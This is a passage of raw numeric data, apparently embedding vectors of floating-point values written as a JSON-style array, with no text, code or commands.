033167813,-0.004939932,-0.030064132,-0.0029534947,-0.0018910335,-0.05433883,0.032755043,-0.0067201676,-0.012972946,0.0065476783,0.011597065,-0.014128738,-0.04444149,-0.01720052,0.00479695,0.0016155858,-0.0045663035,-0.009842473,0.01262943,0.017502444,0.0060940436,0.04224009,-0.001957353,-0.025294721,0.005073356,0.018935688,-0.013892451,-0.01091765,0.0026683747,0.0077039585,-0.019485326,0.022594428,0.008264176,-0.011513175,0.00028495048,-0.0065188766,0.016887007,-0.009779295,0.006665364,-0.0048212353,-0.017749654,0.0071635135,-0.007558914,0.006042767,-0.0027852098,0.03221657,0.037345946,-0.056346543,0.0075482386,0.022496548,0.011982843,-0.06004187,0.03830544,-0.0015167573,-0.018233506,-0.0032860728,-0.014658014,0.020885361,-0.0035091122,-0.03747933,-0.02520299,0.04449239,-0.010179841,-0.007454539,0.049582884,0.0005409403,-0.005120518,0.024718914,-0.00078055135,0.0032942365,0.0040144245,-0.024138313,-0.0015123457,-0.032198824,0.005857267,0.012779499,0.0039563733,0.015085881,0.017175615,-0.01828851,0.009448145,0.021793377,-0.019045662,-0.002829565,-0.000836894,-0.0037035218,-0.03012282,-0.00954639,0.002526091,-0.0077682645,0.0028197798,-0.032047078,-0.0073134815,0.005749822,-0.005939909,0.16207714,-0.024068922,0.0036739127,-0.0018895206,-0.00020878855,0.0014118863,0.0060981265,0.023924064,-0.0016406476,0.007478007,0.0037546612,-0.028716331,0.01878843,0.022274153,-0.038272705,-0.012405364,0.010381318,0.14315964,-0.024721794,0.032459233,0.019731153,-0.0016043433,-0.0095630875,0.006778586,0.014330176,-0.04183496,0.0026636454,-0.028817236,0.014394694,0.018955844,-0.037524775,0.02517816,-0.0016273377,0.0046934504,-0.010167069,0.011068299,-0.006186049,-0.0067451173,-0.016976018,-0.011973308,0.038600676,-0.011079983,-0.019952886,0.011244381,0.012872119,0.0004601245,-0.017075082,0.013141441,-0.0023894305,0.022418508,-0.015207302,-0.023097932,0.003790547,0.010092095,0.00132153,0.0069856364,0.0049019856,-0.011859485,-0.023508208,0.005084141,0.008200167,0.019977516,0.0029776457,0.020523174,-0.016144054,-0.013489051,-0.00934239,0.016711418,0.0066875266,0.009135661,0.031258047,0.020030402,-0.00510527,-0.016496442,0.029152103,0.0062824143,-0.017409025,0.00016261368,0.014312827,-0.009648551,0.026678786,0.025077883,-0.020710602,0.01945914,0.036561836,0.003797357,0.012408807,-0.01905872,-0.012405953,-0.007103849,0.01675326,-0.012540171,-0.00865352,-0.00003554638,0.010408592,0.013891799,-0.00973078,-0.011676941,0.0076471837,-0.025177954,-0.00706068,0.035145577,-0.0008114898,0.009058136,-0.014213793,0.019691661,0.0085710585,-0.018662818,0.0025282877,0.009360681,0.015164485,0.019021649,-0.011340273,0.030353492,-0.0009997624,0.00039260634,-0.011203686,0.0017361692,-0.02104955,0.023960836,-0.0010445779,0.00066817034,0.0030784074,-0.0015294832,0.0045185783,0.0078015244,-0.0056451513,0.013909713,-0.0067710634,0.015876919,-0.0015078969,0.02564737,0.0012966938,0.042438384,0.0046635442,-0.018242514,0.010491619,-0.008268401,-0.019318627,0.016798964,-0.0058829123,-0.004136284,-0.0080712885,-0.0051945117,-0.014169572,-0.022797413,-0.004604491,-0.023897829],[-0.0029577755,-0.0015009466,-0.023533855,-0.0052277013,0.0065888553,-0.029803267,0.0023548254,0.01929111,-0.00677014,-0.00040203825,-0.013337124,0.03660389,0.0035791253,-0.0074974503,-0.022988873,0.0009111793,0.018389184,-0.005902175,-0.011960485,-0.010213395,0.0052623046,-0.005768685,0.013688649,-0.0075338283,0.007177739,-0.0042767683,0.004140131,0.007503558,-0.00048311116,0.005736018,-0.008331066,0.017518818,0.017334284,-0.03484022,0.016982535,0.0021167481,-0.017451866,-0.008649757,-0.0029834718,0.013482847,-0.006151277,0.012687014,-0.008837997,0.024435649,-0.014994419,-0.0007447086,-0.010337916,0.012325503,-0.023662712,0.011364038,0.005578887,-0.006997567,0.0027122812,0.011401486,0.00036608303,0.02912845,-0.0060258945,-0.0053070392,-0.0023302627,-0.020797106,-0.0027603072,0.009074181,-0.009425511,-0.022634856,0.019071281,-0.020895435,0.016977116,-0.00349517,0.007430657,-0.011965512,-0.00901584,0.015313615,0.0031673214,0.009164298,0.004493369,0.016409108,-0.004991831,-0.024257123,-0.014913477,0.01931472,-0.012546276,-0.0066732247,-0.007254216,-0.008154171,-0.011221525,-0.00072734157,-0.010559699,0.0001975116,-0.016314156,-0.024060596,-0.024949906,0.003840451,-0.006583173,0.010966778,-0.003927966,0.021584969,0.021014398,0.0117706265,0.006063872,0.0130503,0.004233446,0.0011090218,-0.021306166,0.013258864,-0.0022684587,-0.02811705,0.008076759,-0.01656226,-0.009901099,-0.00962904,-0.0055385916,0.011908516,0.006065454,0.009592494,0.016179232,-0.007814867,-0.0009138221,0.0117864255,-0.012260016,0.01036464,-0.0071623228,0.02070649,0.004652209,-0.008161731,-0.0123169245,-0.010173741,-0.0091628,0.030138634,0.0074416706,0.011314486,0.0034132623,0.01583647,0.00030312626,-0.0033244083,0.009015246,0.015596346,-0.001095178,-0.0040716864,0.0077344878,-0.015129353,-0.004088425,-0.013129998,0.0015578166,0.0036236232,0.015001486,0.028629933,0.00000929557,0.016842604,0.005523288,-0.0028592965,0.010257918,0.00020784322,0.016939828,-0.017896464,-0.0026683018,0.022045432,-0.0015678927,-0.004606703,-0.003307034,-0.015413931,-0.008252666,-0.00046806678,-0.013063206,-0.0149913775,-0.004323606,-0.029539041,0.007744194,-0.017511742,-0.018304767,0.013237323,0.020496542,0.033275206,0.0037978198,0.008798839,0.0068897726,0.023348248,0.0014953323,-0.012037628,-0.003929133,-0.022008436,0.016284982,0.037050217,0.0034947281,0.011489288,0.016615663,0.0037192209,0.003906302,-0.0077209976,-0.026319968,0.0048317905,0.037462756,-0.00082353025,-0.0028898092,-0.0043110903,-0.008966736,-0.029932711,-0.005072768,0.10274509,0.0013191592,0.00698145,-0.027766472,-0.0032362624,0.009397882,-0.021329599,-0.0048000207,-0.013944021,-0.0120991375,-0.020865818,0.0145093305,0.0023585183,0.014029827,0.0012332805,-0.014165546,0.005244223,0.009713804,-0.06917767,0.009059721,0.024656232,-0.005053671,-0.0005469267,-0.01326188,-0.00018937116,0.015868554,-0.030725496,-0.02306222,-0.019255266,-0.014674085,-0.0024578506,0.016862284,-0.02909859,0.004089123,0.015068416,-0.02468298,-0.035340298,0.01026254,-0.012375542,-0.0027391412,-0.018656025,-0.0132025005,0.0024256594,-0.008722243,0.01447393,0.013505955,0.040146343,-0.0058395374,0.0033684287,0.023268294,0.0001168093,-0.03088782,0.016802829,0.01164251,-0.007899564,0.0023127263,0.025094304,-0.01764012,-0.007300838,-0.020667624,-0.017378902,0.010365028,0.012147894,0.016342878,0.025998652,-0.015140397,0.022687804,0.032259684,0.021079341,0.011272499,-0.031821653,-0.011281526,-0.0058176178,-0.021767542,0.008669063,0.0066420515,0.002444263,0.010639047,-0.015967669,0.013542691,-0.0011921445,-0.005595079,0.008768219,-0.0047671706,0.00050717406,0.0040675714,-0.028730083,0.0025438908,0.0069902376,-0.00043029196,0.0046708197,0.035275336,-0.004805933,0.0042717895,-0.0034501255,0.028584804,0.0043721953,-0.011798558,-0.019511536,-0.0074016266,0.010003926,0.0061594015,-0.013046361,0.010994594,-0.0038105175,0.012718405,-0.012220609,-0.008939899,-0.021926448,0.013328614,0.030974634,-0.008358293,0.018268043,-0.0012309693,-0.007570014,-0.02323135,0.009012892,-0.020210499,-0.0007704477,-0.018302804,-0.025466261,-0.008589741,0.016553491,0.03342843,-0.021038106,-0.015176959,-0.023411656,-0.018956514,0.0021779793,-0.0006719328,-0.0017162061,0.01802977,0.0070885126,-0.001227576,0.006307845,0.03191245,0.015694423,-0.01602292,0.023699587,-0.020913363,0.02580959,0.00050464494,0.012051979,-0.018329946,-0.010727635,-0.0049669747,0.020613622,-0.0075484915,0.0063335095,-0.012283874,-0.0024666374,0.014066987,0.01943611,0.019594684,0.0019092184,0.009415915,-0.0052543683,-0.020395752,-0.0042252145,-0.013386168,-0.0095802825,0.013700331,-0.0096483445,0.034565825,-0.017213808,-0.010525612,0.016729275,0.08700559,0.004533306,-0.012365679,-0.009372086,-0.023754952,-0.00846819,0.025090871,0.020929346,-0.00991572,-0.009092554,-0.019197632,-0.03133153,-0.0004338044,-0.005238056,-0.0103404,0.024954181,-0.023050975,-0.012120022,-0.019561702,-0.020013107,0.048817538,-0.026175924,0.0029686168,0.029431624,0.011088702,-0.000040289557,0.0005375311,-0.010047137,0.0074736187,-0.029769935,-0.012969245,-0.013766781,0.010559317,0.012660696,-0.048050422,0.027724773,0.0005607408,0.0037539895,-0.0012075,-0.0059813,0.017558178,0.017004093,0.0068043545,-0.023169424,-0.016149143,0.032888923,0.012100026,-0.0025606493,-0.0018365659,0.017402366,0.0048222286,0.022047939,-0.025203941,0.017853158,-0.0011458123,0.034303986,0.015569597,-0.039451964,0.040169053,0.019948617,0.016019821,0.023215381,-0.0032074929,0.00554848,0.0043866136,0.015206903,-0.012726747,0.007627713,-0.0056021847,-0.00055660174,0.011149032,0.021892212,-0.00053695205,-0.0009931615,-0.010772804,0.021159042,0.0012322961,-0.0041158344,0.0004401732,0.0017290785,-0.018032638,-0.0038956183,0.015455737,0.0030859106,-0.0070953085,-0.006224868,-0.0037052943,0.018046243,0.0068983925,-0.009992102,-0.0074089714,0.0080169495,0.0013530367,0.007951091,0.031944983,-0.0027201127,0.013824082,0.015215896,-0.011704869,-0.0012747062,0.011841126,-0.002056599,0.009444668,-0.014298667,0.005911158,0.0030593805,0.0013572784,-0.013283577,-0.00024725313,0.021216141,-0.020977698,-0.0011319848,-0.014837802,-0.009174282,0.007421347,-0.030806039,-0.010588863,-0.0159979,-0.015165219,-0.013863322,0.01212074,0.008497222,0.027106196,0.01234392,-0.009553666,-0.0051638572,-0.016010005,-0.010261948,-0.00485332,0.0196575,-0.0019823492,0.016457822,0.016573243,-0.041449107,0.02920177,0.012278387,-0.017508015,-0.038722295,0.03815404,-0.005783275,0.0052121417,0.010209501,0.04147055,-0.025942734,0.00933242,0.017755553,0.007751645,-0.0008201891,-0.018810926,0.012360091,-0.01374603,0.00064987375,0.01352582,-0.016600085,-0.002541718,0.008665556,0.013175023,-0.031671587,0.00032587576,0.0029995102,0.023831049,-0.034061696,0.026124937,0.013601611,-0.0115789175,0.010948218,0.0041643865,0.062898785,-0.020848691,-0.020056253,-0.0006913944,0.013900978,0.014747021,-0.00783818,0.010342082,-0.0301504,0.014593915,0.0039697024,0.019787252,0.007923295,0.011933749,0.007689965,0.002338273,0.0012471675,-0.0055137854,-0.021950124,0.011277053,0.003375404,0.0007544306,-0.005797122,-0.009815302,-0.0123245185,-0.0060009733,0.020243257,0.0047885105,-0.010411117,-0.021232216,-0.0075100716,-0.0034063589,0.0028085029,-0.009333641,0.0045108525,0.0034246321,0.03095501,-0.0017350365,-0.020062657,0.029001651,-0.014595418,-0.00621196,-0.004993117,0.0057024304,0.01078755,-0.00919193,0.01611025,0.023700759,0.019874092,0.00048838765,-0.00410833,0.016396243,-0.005709574,0.0073300577,-0.012950489,0.006628465,0.030117312,0.0030946485,-0.0004304855,0.022264468,-0.00013380474,0.001543104,-0.0026186185,-0.0020186554,-0.02146862,-0.015932824,0.011573703,-0.0027938993,0.00016510104,-0.036698047,0.0019737815,0.014081609,-0.008641346,-0.017047795,0.021597762,0.004690826,-0.007685436,0.006415209,0.011820575,-0.01758997,0.0011909956,0.028217394,-0.0032431025,-0.008556914,0.033202223,0.0034582054,0.0023634296,-0.010294276,0.010845838,0.0023470994,-0.00555542,0.0078427885,0.03445849,0.021284359,-0.004931719,0.012842332,0.0015738277,-0.012135959,0.0040971097,0.023271907,-0.011335087,0.0076075606,0.00072565855,0.043208934,-0.019411502,0.0059179747,-0.005276946,0.00684096,-0.00044441066,-0.024461621,0.008162812,-0.049269613,0.0036903354,0.021986622,0.007248638,-0.00156366,0.051146638,0.02381563,0.017752785,0.002340918,-0.0006383462,-0.012008402,-0.013218399,-0.0020950832,0.012076766,0.024549155,0.0018277008,-0.04396983,-0.014958654,-0.023230277,-0.034058336,-0.023123117,0.042459995,-0.0049897563,0.01851359,0.014476822,0.005504441,-0.018935466,0.01027899,0.012136811,-0.034800954,0.005493881,0.0031286555,-0.0048122206,0.006309081,-0.01508676,-0.008660855,-0.003168725,-0.015222011,0.001303084,0.005504487,-0.0131096095,-0.03647349,-0.007003804,0.0054746,-0.019118533,0.03750202,-0.039655525,0.022765296,0.0016632773,0.03453156,0.017237931,0.006988039,0.011256101,0.016916182,-0.009650622,0.031203827,-0.0021221784,0.019401468,0.009341494,0.020126304,-0.008887698,0.011278371,-0.00022061708,-0.030536665,0.011098658,0.010778103,0.020850696,-0.013132385,0.010106189,0.0032806874,0.024328982,0.0022773237,0.015151522,0.0021742652,0.016488383,0.007541542,-0.012883747,0.007184218,0.004167044,-0.00036523928,-0.010822462,-0.014874346,-0.017150985,0.0063938373,0.036350027,-0.010192492,0.016111393,0.008463184,0.0066522406,0.0049268696,-0.014956805,0.00028421494,-0.0025008214,-0.015152315,-0.016325675,-0.016649835,0.016819505,-0.026624968,0.021419255,0.012537794,0.009476827,-0.0032658982,-0.0046444917,-0.03125008,-0.0046302676,-0.013896004,-0.044591248,-0.0041553755,0.005974939,0.018416587,-0.034746546,-0.004031773,0.012925401,-0.014886089,0.0031846114,0.025675526,-0.027860245,-0.010058786,0.0072252173,-0.015135476,0.028373387,0.017431514,0.019649714,-0.0016842699,-0.015569088,-0.011219032,-0.01080936,-0.0020772319,-0.005467914,-0.005828204,0.011983391,0.016811024,0.0046495628,-0.004178595,-0.022828689,-0.016843975,0.021764671,-0.024313087,-0.010086765,-0.018917998,0.026047919,0.0055786637,0.03127304,-0.025130486,0.00033511835,0.019363768,0.0028939266,0.0070562335,-0.0021691138,0.0040380084,0.030607669,0.019645749,-0.007399953,-0.01557589,-0.008475472,0.005480131,-0.02005637,0.007302709,0.009431622,-0.024124522,-0.0055829887,-0.016710535,0.012366194,-0.009545792,-0.002034513,-0.0018896032,-0.040001582,0.026423588,-0.009746366,0.021653218,0.013779827,0.0010260562,-0.0050569205,-0.003791227,0.018236758,-0.0365848,-0.010601489,0.017178966,-0.024140641,0.014918618,0.002741244,-0.021307023,-0.028057097,-0.026310906,0.002909046,-0.006934286,0.020869963,0.018134013,-0.017235741,-0.025070246,0.0054348246,-0.0075044916,0.019377464,-0.014468372,-0.0002459117,-0.0029700145,-0.008016354,0.0055620773,0.034413707,-0.01681381,0.0043593682,0.023895541,-0.017680522,0.017864434,-0.009411743,0.017543966,-0.022631414,0.010595827,0.009135781,-0.0076214136,0.020227868,0.004160488,-0.010599611,0.02071473,-0.004192225,0.017197235,-0.0037406185,-0.018849919,-0.022157166,0.001011066,0.022061044,-0.0068288054,-0.010165339,0.009880722,0.00029055562,-0.0009742439,-0.01683033,0.025498776,-0.009766689,-0.019538503,0.0068554133,-0.010240338,-0.019147037,-0.02274608,0.0067862063,-0.0021633715,0.0081687,0.0073864665,0.006536393,0.023365334,0.022827152,-0.021359885,-0.018364321,-0.00056404,-0.018200275,0.0048090816,0.008469894,-0.0023117315,-0.0019389092,-0.01807581,0.019414145,-0.045929566,-0.020590642,-0.0018401891,-0.008581556,0.0068206606,-0.003307174,0.0067526586,-0.012899491,0.0015604891,0.024511755,-0.01439107,-0.0063931486,-0.013724468,0.012778488,-0.009711457,0.0028846746,0.028548693,-0.009805616,-0.0052163536,0.015129746,-0.0073039867,-0.0088133635,0.011504716,-0.019171491,0.023669604,0.021410428,0.004375274,0.0028659,0.0008958702,-0.017285962,0.020335479,0.019258855,-0.0057637882,0.010331676,-0.0283841,-0.008699377,-0.008377435,-0.011810424,-0.010791184,-0.019277794,0.0038795832,0.018991157,0.0013936255,-0.016302163,-0.023538524,-0.07450344,0.032442648,-0.002829833,-0.011624925,0.0022827385,0.017828016,0.0178617,0.0065950686,0.046610497,-0.008567032,-0.00066281814,0.0065106573,-0.016659927,0.012769316,-0.0015798227,-0.0070819175,-0.030246451,0.012012551,0.028004717,-0.01339658,0.008444248,0.0035679364,0.008536762,-0.0029484546,0.04422128,0.01037636,-0.0005177909,-0.019346412,-0.023756586,-0.009543634,-0.003885619,0.008116406,0.00016245729,-0.011772283,-0.0068952274,0.00054522936,0.016299164,0.015482146,-0.012749334,0.007655307,-0.010344794,0.0024243477,0.004315617,0.0133173885,-0.014029453,-0.031678192,0.0076874713,-0.007133377,-0.00023699044,-0.024793126,0.03221065,-0.0014848756,0.008957254,0.01817968,-0.023698984,0.017316366,-0.014413586,0.0067053703,0.005253385,0.0097843995,-0.010109284,-0.0016849054,0.015660973,0.003006779,-0.03520075,0.007161728,-0.00014675918,0.026482677,-0.010766154,-0.017013429,-0.006700612,-0.011875279,-0.014274078,-0.0041284785,-0.02272865,-0.00059769105,0.00036210645,-0.010380874,-0.009583336,-0.0029762893,-0.010526528,0.014700518,-0.02164952,0.00092911,-0.01963415,-0.003973745,0.010703312,-0.013316517,0.0076098195,-0.0025485498,-0.0020785935,-0.008517695,-0.0016077923,0.011607281,0.01156218,0.022475133,0.01589024,0.0119614815,-0.0012853275,0.0009303458,0.022442456,0.0020745278,0.0024188682,0.04411445,0.007798937,0.00071418955,0.0017105367,0.0020034902,0.01640106,0.031392798,-0.018237587,-0.002491291,-0.0039775646,0.030928021,0.019354712,0.00047593433,-0.0036577797,0.009266041,0.005414479,0.023133563,0.015621354,0.004739541,0.031792425,0.0026270542,0.014053424,0.010383327,0.0026014713,0.015777422,-0.027351819,0.01063179,0.008032344,0.018326813,-0.0041791718,0.0004984377,0.011952884,-0.0028939638,-0.0031549647,-0.029163402,-0.014332695,0.00393384,-0.026436413,0.013039838,-0.020447817,-0.0013448062,0.0018610595,-0.02079336,0.014461477,0.00065065,0.0004164174,-0.0002533176,-0.0006428433,-0.005598296,0.01799549,-0.011651391,0.014005944,0.012608161,0.0122704785,-0.027119525,-0.005201293,-0.0021126957,-0.006614957,-0.026391862,-0.0007960461,0.0050887736,-0.03476343,0.015698237,0.009530185,0.006152218,-0.00943816,-0.0029249971,0.0032481763,0.016162539,-0.010362634,0.039221775,0.009973487,-0.0342406,0.004754681,0.004841252,0.0053229714,0.010783878,-0.010197848,0.053750582,0.01119447,-0.012990316,0.018704204,-0.011090218,-0.011087504,-0.012063183,-0.009378005,-0.011662203,-0.016779521,-0.007570968,0.01236767,0.003509238,-0.022014959,0.03569259,-0.00026490315,0.011669338,0.0027045808,0.001140893,-0.0053880517,0.03904852,0.0046500247,-0.008929297,-0.018545333,0.020842081,0.019247223,-0.057411294,-0.007981584,0.014843653,-0.011278631,-0.0077315513,-0.0023093403,0.0010397946,-0.019504037,0.0011984283,-0.013292196,-0.003726468,0.005338024,-0.012704477,0.0054357788,0.031710863,0.009693972,-0.0038365058,-0.0033584163,0.0026602107,0.010783043,0.016164372,-0.0031648548,0.0050879363,0.041106995,-0.012091355,0.029859018,0.015703646,-0.033800296,0.0043496257,-0.0053563286,-0.0006848803,-0.024457062,-0.004039778,0.0118278405,0.0040569315,0.01572758,-0.0059202,-0.016363721,0.03866532,-0.012103026,-0.0024583736,-0.006709771,0.014530847,0.0048312624,0.001348527,0.013733873,0.015172174,-0.010146663,-0.003911614,-0.03513449,-0.01960083,-0.0014586428,-0.0054204427,-0.01609311,-0.010111763,-0.0042308583,0.0034427845,-0.005485755,0.0119701605,0.0069037653,0.005317768,0.02586705,0.00886743,0.0048286575,0.00039991972,-0.0012131343,0.03879536,0.0064396556,0.005685496,-0.01440916,-0.009962125,0.01125798,-0.0028813186,0.0028963075,0.016831959,-0.0051654573,-0.01859164,0.00956701,0.016997404,0.021554116,-0.020746209,0.003910971,-0.018029604,-0.01118966,-0.024661833,0.0014739033,0.0049148574,0.017236473,0.0009245049,0.00031211032,0.0052201273,0.0058723968,-0.016079906,0.072340555,-0.031473216,0.0026034387,-0.014680556,0.011749063,-0.017586133,-0.0063838745,-0.000059420065,0.0042629493,-0.0065615373,-0.02932851,-0.026128292,-0.03405787,-0.016236233,0.007845915,-0.000886555,-0.0015651534,-0.0064661913,-0.0027732896,0.027074784,0.012486937,-0.005631369,0.0135373995,0.0057415855,0.0031642646,0.010771818,0.013406091,-0.029663054,0.0138492035,-0.0018572697,0.007870174,-0.0012140457,-0.006072456,0.015673822,-0.01584803,0.007266211,0.0016486725,-0.011945184,-0.014963031,0.0023447422,-0.0029181154,-0.0074720206,0.041826896,0.0017848877,0.012074293,-0.009918459,-0.010519634,-0.012777238,0.010747756,-0.011461868,0.020333095,-0.006132899,-0.008650472,-0.0014128481,-0.03776577,0.008938386,0.010910232,0.017024165,0.01908673,0.000048743535,-0.003999356,0.010579173,0.010604209,-0.013996643,-0.0032592942,-0.0026323688,0.011571048,-0.017152887,0.0060248333,-0.010661683,0.012399882,0.0011013595,0.021445831,0.0012143314,0.0033864172,0.0074078366,0.0040193195,-0.00046502397,-0.032480784,-0.02068373,-0.019812085,-0.01271051,0.03344026,0.029422663,0.016526602,-0.010916187,-0.004628212,0.020527208,0.055811025,0.007222282,0.028081598,0.0063064885,-0.0051125665,0.020173894,0.020513717,0.01968593,-0.0090895165,0.0070211687,-0.030056212,0.025985926,-0.0027085992,0.008551444,0.007743077,0.0055204527,0.0053981123,-0.015335461,-0.012126102,-0.015764814,0.01692195,0.038852412,0.012016844,0.00010003378,0.006395515,0.009220988,0.0013248789,-0.017475177,-0.0037284489,0.001004504,-0.020567123,0.0052995295,0.029478526,-0.018605614,-0.024339115,-0.036055773,0.016310839,0.15699813,-0.0011570866,0.0057589975,0.034382302,-0.010210876,0.013350574,-0.16128713,0.017957345,0.02655619,-0.0073715514,-0.009942972,-0.004534401,-0.014748307,0.02390094,0.0114215035,-0.007608411,-0.0028752317,-0.02721793,0.02277652,-0.008358548,0.0034615851,-0.0072899233,-0.008074919,0.011879357,-0.034806464,-0.003638196,-0.0042993748,-0.009282838,0.0052971104,-0.001717199,0.024229366,-0.016533919,0.009940891,-0.0009783375,-0.021910932,0.0013519324,0.015868828,-0.0012349521,-0.025582751,-0.0050801565,0.025739318,-0.0056787413,-0.0045476886,-0.013382212,-0.15785402,0.0114456415,-0.0073086806,-0.046446953,0.014038193,-0.0071386173,-0.012812259,0.014361189,-0.0023884838,0.013707419,-0.026678959,0.025856616,0.016829131,0.009268522,-0.012487138,-0.00616835,0.015698327,0.0023743422,0.007966596,-0.013812598,0.010002393,0.0038613337,-0.010710701,-0.0026126937,-0.017453244,0.006464411,0.00064269354,0.026651751,0.0068829902,0.009413024,-0.011056342,0.00017360055,-0.013722092,0.00460646,-0.008378254,-0.00867652,-0.0045882645,0.011764173,-0.0146484645,0.009726032,-0.00587473,0.0032976489,-0.006321271,0.0013689722,0.0040867063,0.00056991447,0.0007529683,0.0022213089,0.013534961,-0.011219258,0.038114328,-0.0130239865,-0.016685711,0.012941743,0.008149836,-0.004044155,0.0066761933,-0.038635638,-0.008840409,0.011211934,-0.013651627,-0.0020467327,-0.012515168,-0.007970927,0.033979498,0.008645568,0.013907078,-0.019803187,0.0024086798,0.011187375,-0.006573599,0.007983294,-0.007893656,-0.021196583,0.0056889816,0.005617476,0.00012599988,-0.0004336092,0.00078491366,-0.024290213,0.021250963,-0.008912918,0.00031034235,-0.049605303,-0.0022498528,-0.017310278,-0.003962256,0.002226565,-0.003809631,0.012220377,-0.0016225554,-0.009687086,0.020889217,-0.006320268,0.033760503,0.008775521,0.02630939,-0.019807618,-0.014744965,0.0074060108,-0.0017465906,-0.014316856,-0.008373694,-0.012801104,-0.0114233475,0.0036651779,-0.0049227,-0.010292599,-0.028861556,-0.001999637,0.00091777364,0.008092915,0.014448294,-0.010692809,-0.025909595,-0.024087088,0.016210206,0.00963561,0.024657838,-0.0029517796,-0.033067964,-0.00028841037,-0.007282915,0.010679695,0.03139312,0.013230154,-0.019098276,-0.0032324994,-0.009751852,0.018157607,-0.007841548,0.022037646,0.0056679454,-0.008123629,-0.013292608,-0.004381762,-0.01889544,0.013901425,-0.01342531,-0.009385866,-0.0049837586,0.0065277405,-0.016053338,0.004745322,0.013646337,-0.009162579,0.01970972,-0.019966517,0.01989055,0.0018133774,0.008606588,0.03263737,-0.021902546,-0.0129900575,0.008544981,0.052450977,0.011280541,-0.017821362,0.01237485,0.013591935,0.006669075,0.020240165,-0.011613358,-0.028164437,-0.0129225,-0.013663339,-0.014353368,0.005381075,0.0032392729,-0.025628092,0.024689967,0.007144083,0.003051845,0.012358417,-0.008412052,0.024723444,-0.022873735,0.001273845,0.03449121,0.0031112859,0.00990315,0.011875296,0.003664227,-0.010281572,0.0016586939,-0.01713058,-0.0013836593,0.006735361,0.00018980331,0.013506198,-0.04084493,-0.019488947,-0.004978237,0.015063801,-0.0036095693,0.012957867,0.0008367038,0.0058954624,-0.012374033,0.005155731,-0.012877361,-0.01946043,0.013820022,0.009571612,-0.0071452097,-0.005321906,0.008878187,-0.0031959813,-0.009075421,0.009685495,-0.01118809,-0.01584943,0.0032985145,-0.014261352,-0.003962057,0.03931592,-0.009201014,-0.010344635,0.0031222855,-0.022651855,0.003087437,-0.0012962279,-0.0054770266,-0.009625567,0.02461376,0.012717497,-0.017641189,-0.025985837,0.013877002,0.014460221,-0.0038670558,-0.039711963,0.012184411,-0.022933533,0.027246935,0.017314605,0.021319527,0.00949547,0.004651131,-0.031658586,-0.037169755,-0.010343,0.04686022,-0.025642551,0.0003628782,0.016618537,0.018068664,-0.005230595,0.0025550534,0.00023361258,0.0031573349,0.014201538,0.004868962,0.005498233,0.0026459338,0.016669486,0.021751672,-0.011942044,0.0014082593,0.0033101942,-0.013879197,0.012461103,0.02045653,-0.007433151,-0.008669075,0.0129375905,-0.017532717,-0.0009095731,-0.018658219,-0.0013192401,0.045581866,0.0032967883,0.015372999,-0.0051924274,-0.014744791,-0.011679821,-0.006697547,0.0076752133,0.0061594667,0.00292521,-0.012374477,0.01076499,0.004717196,-0.045014136,0.021501727,-0.0002727635,0.0013343645,0.013877815,0.0004698984,-0.0009915506,-0.010039159,0.0010164082,0.016330585,0.007603636,0.017912993,-0.012196994,0.0016208974,-0.018925726,0.0041939192,-0.0067684264,0.0076014316,0.0026845085,-0.01319832,-0.021970851,0.008601486,-0.021760894,0.012131864,-0.008499549,0.0021952903,0.007957417,0.0035648947,-0.025746794,0.0051710787,-0.014182098,-0.013562816,-0.004907913,0.035356473,-0.0020863886,0.0020749322,-0.023007644,0.023549622,0.049916636,-0.006105463,0.02119667,0.0011610071,0.022658875,-0.02465752,0.016700035,-0.0067613698,0.009074419,-0.039787542,-0.00080511917,0.0055129714,-0.0041260337,-0.01531665,0.017108703,-0.00012254262,-0.0074209105,-0.0076584066,-0.0043399124,0.020402836,0.00311585,0.035199746,-0.019020682,0.0011723662,-0.004657359,-0.0022168464,0.002523653,0.0017898802,-0.046409417,-0.0029806388,0.019391637,0.009212143,-0.00053302554,-0.0016897187,0.0025138415,0.008815974,-0.027655983,0.0041376054,0.0027849614,0.0012687386,-0.0073580737,-0.038538527,0.0023186975,-0.01069788,-0.022083323,-0.0049720556,-0.013997034,0.009211646,0.002214066,-0.010803322,0.00096760626,0.014953439,0.017305853,-0.013014129,0.005028611,0.009647646,0.002733165,0.010782412,0.010077508,0.012005101,-0.017826185,0.06909876,-0.018592592,-0.0015066516,-0.0074769035,0.03913385,0.0019259269,-0.031860303,0.010526742,-0.016365072,-0.024611754,-0.0015184665,-0.04691675,0.004435599,0.019879859,-0.01602621,-0.012815774,0.014583164,-0.022110194,0.00049355027,0.01656268,-0.009623693,0.0031134242,0.03145101,0.022421516,-0.015458039,-0.03248413,0.0040929792,-0.0011259133,-0.022649923,0.0032046488,0.00038614706,-0.0045910045,-0.03134445,0.0009978748,-0.016458249,0.0013380002,0.005306517,-0.006657689,0.0070672138,-0.0029749502,0.031574383,0.009996068,-0.008514066,-0.0076783705,-0.004701493,-0.012822299,-0.020940708,0.0145331705,-0.0057837972,0.029026646,-0.027692035,0.015222937,0.031268947,0.036889624,-0.025024798,0.011526399,0.018376099,-0.0001582363,-0.0059669316,0.01772466,0.014825561,0.009711937,-0.050868515,-0.010504662,0.0075588673,-0.00058840076,-0.017941436,-0.021095982,-0.002183723,0.009639415,0.0002827445,0.009064024,0.01037181,0.028533252,0.023859978,-0.002596948,0.02492374,-0.026832296,-0.00494951,0.02482116,0.0026848677,0.016700631,0.0018294961,0.00038956982,0.017476525,0.007573672,-0.0112066865,0.015180723,-0.020965915,0.015763948,0.063305534,0.0061235097,0.015997898,0.0049868478,-0.002219601,0.00039682208,-0.003469259,-0.01816814,-0.0011906384,-0.024092361,-0.010038617,-0.019851053,-0.0029782194,-0.006636524,-0.00846027,0.003669803,-0.09986526,-0.003960369,-0.023038995,-0.014908141,-0.015866395,-0.0074990666,-0.00048047205,0.026674591,0.009359962,-0.026140517,-0.020286174,0.03578998,-0.012876569,0.022828938,0.007441946,-0.007005871,-0.043303292,-0.0109505365,-0.014711307,0.0029220355,0.023970993,-0.013882878,0.014767148,0.009119251,-0.007799447,0.0022444506,-0.022505641,0.0043962426,0.0070352643,0.0012944562,-0.029161109,0.0011418926,0.014773527,0.012068984,-0.00056709826,0.008568011,-0.0036060878,-0.0076792417,0.0019918655,0.020258537,-0.00256475,-0.0041063996,0.015017844,-0.010335843,0.019150844,-0.0187969,0.00050100975,0.006248976,0.018220302,0.020375965,-0.0011796715,-0.014460417,0.0032194867,-0.0018980821,-0.003783164,-0.013068828,-0.0046096034,0.014087655,-0.016869187,-0.0067072893,-0.021777067,0.0055081956,0.0069560646,-0.012945426,0.005302124,0.006096273,0.0029822525,0.009356674,-0.027129501,-0.0059161223,0.019558107,0.040268056,0.003180919,-0.001124